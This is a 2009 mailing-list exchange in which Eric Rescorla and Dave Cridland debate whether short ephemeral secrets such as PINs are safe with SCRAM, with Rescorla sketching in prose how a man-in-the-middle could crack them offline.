On Fri, Mar 6, 2009 at 6:39 AM, Dave Cridland <[email protected]> wrote: > On Fri Mar 6 14:03:58 2009, Eric Rescorla wrote: >> >> On Fri, Mar 6, 2009 at 5:04 AM, Dave Cridland <[email protected]> wrote: >> > I don't think it is - we're not talking in terms of a long-term >> > shared-secret, we're talking about an ephemeral secret shared (say) over >> > the >> > phone, used purely to verify a channel, and, by that, optionally the >> > peer's >> > X.509 cert. >> >> You're assuming that these aren't separated by a time scale of hours to >> days. I don' think that's at all safe. >> >> > Well, yes. But you can't do an offline dictionary attack on SCRAM until > you've witnessed the SCRAM exchange. By which time it's too late to do > anything about it.
Uh, no. You MITM the initial connection, then wait for one side to offer his proof. You then simulate a failure, crack the password, and move on. Note that if the password is short enough, you can crack it in real time and move on. >> > If an offline dictionary attack can be mounted within the kind of >> > timescales >> > we're talking, then I'm off to buy a tinfoil hat, because those guys >> > have >> > had it right all along... ;-) >> >> I heard suggestions of 4 digit PINs. Those can be bruteforced in less than >> a second. > > Still needs time travel to make this attack work, doesn't it? No. -Ekr
